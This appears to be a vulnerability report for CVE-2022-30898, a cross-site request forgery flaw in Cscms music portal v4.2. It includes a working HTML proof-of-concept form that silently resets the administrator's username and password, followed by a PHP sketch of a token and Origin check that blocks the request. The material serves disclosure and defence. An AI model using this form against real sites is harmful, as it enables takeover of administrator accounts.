CVE-2022-30898: Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 · Issue #37 · chshcms/cscms
A Cross-site request forgery (CSRF) vulnerability in Cscms music portal system v4.2 allows remote attackers to change the administrator’s username and password.
A cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allows remote attackers to change the administrator’s username and password.
Trigger condition: the administrator clicks a malicious link
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.136.136/Cscms_4.2/upload/admin.php/sys/save" method="POST">
      <input type="hidden" name="adminname" value="admin" />
      <!-- The password you want to change here is 123 -->
      <input type="hidden" name="adminpass" value="123" />
      <input type="hidden" name="sid" value="1" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
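A defender-side sketch of the check the save handler lacks, added here as an example and not taken from the Cscms code base: a per-session token plus an Origin/Referer comparison, applied to the form fields shown in the report. The function names, the `csrf_token` field and the `attacker.example` origin are assumptions made for the illustration.

```php
<?php
// Added example: hypothetical helper names, not Cscms code.
declare(strict_types=1);

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only for a POST whose source origin (when sent) matches ours and
// whose body carries the token stored in the session.
function csrf_request_allowed(array $server, array $post, array $session, string $expectedOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Browsers send Origin on cross-site form POSTs; fall back to Referer.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '') {
        $p = parse_url($source);
        $origin = ($p['scheme'] ?? '') . '://' . ($p['host'] ?? '')
                . (isset($p['port']) ? ':' . $p['port'] : '');
        if (!hash_equals($expectedOrigin, $origin)) {
            return false;
        }
    }
    // Constant-time comparison of the submitted token with the session token.
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

// Constructed sample 1: the cross-site request from the report (no token, foreign Origin).
$session = [];
$token   = csrf_issue_token($session);
$fields  = ['adminname' => 'admin', 'adminpass' => '123', 'sid' => '1', 'id' => '1'];
$server  = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
var_dump(csrf_request_allowed($server, $fields, $session, 'http://192.168.136.136'));

// Constructed sample 2: the same fields posted from the admin page itself, with the token.
$server['HTTP_ORIGIN'] = 'http://192.168.136.136';
var_dump(csrf_request_allowed($server, $fields + ['csrf_token' => $token], $session, 'http://192.168.136.136'));
```

Requiring the current password on the credential-change form and setting `SameSite` on the admin session cookie are complementary controls that do not depend on this token check.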